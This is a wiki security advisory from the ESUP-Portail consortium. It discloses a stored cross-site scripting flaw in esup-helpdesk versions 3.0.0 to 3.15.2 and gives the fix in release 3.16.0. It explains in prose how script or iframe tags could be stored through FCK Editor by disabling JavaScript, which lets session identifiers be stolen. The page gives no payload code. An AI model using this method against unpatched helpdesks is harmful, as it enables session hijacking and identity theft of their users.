Child pages
  • ESUP-2009-AVI-001 - esup-helpdesk vulnerability
Skip to end of metadata
Go to start of metadata

Usage and diffusion of this document

The security advices of the ESUP-Portail consortium concern softwares distributed by the consortium. It is the responsability of each recipient of this document not to diffuse it to other people for obvious security reasons.


esup-helpdesk vulnerabiliy



First version

2009 January 12th 

Latest version

2009 January 14th


University of Rennes 1




  • 2009 January 12th: reception of the vulnerability
  • 2009 January 13th: validation of the vulnerability (Pascal Aubry)
  • 2009 January 14th: diffusion of release 3.16.0 (Pascal Aubry)

Attached files



Identity theft by stealing session identifiers thanks to XSS attacks.

Affected systems

  • esup-helpdesk distributions from 3.0.0 to 3.15.2


esup-helpdesk uses FCK Editor to enter ticket actions and edit FAQs. The HTML code entered this way is shown to the user as-is in the history of tickets and FAQs.


  • From 3.0.0 to 3.15.2, by loading a page that uses FCK Editor and disabling Javascript, it is possible to enter malicious code into the database, for instance by using HTML tags <script> or <iframe>. Afterthat the code is excuted by the users that view the affected ticket or FAQs.
  • From 3.14.5 to 3.15.2, consequence of a mistake in the upgrade of FCK Editor (from 1.7.26 to 1.8), it is possible to enter arbitrary code without invalidating Javascript.

Javascript attacks include the steal of session identifiers, thus authorizating identity theft.


Release 3.16.0:

  • removes the malicious tags entered by users before storing data to the database;
  • removes the malicious code that could have been entered with previous releases.

Event if it is possible to trace the attacks (all the actions are traced in the application), it is strongly recommended to upgrade to release 3.16.0 or later as soon as possible.


  • No labels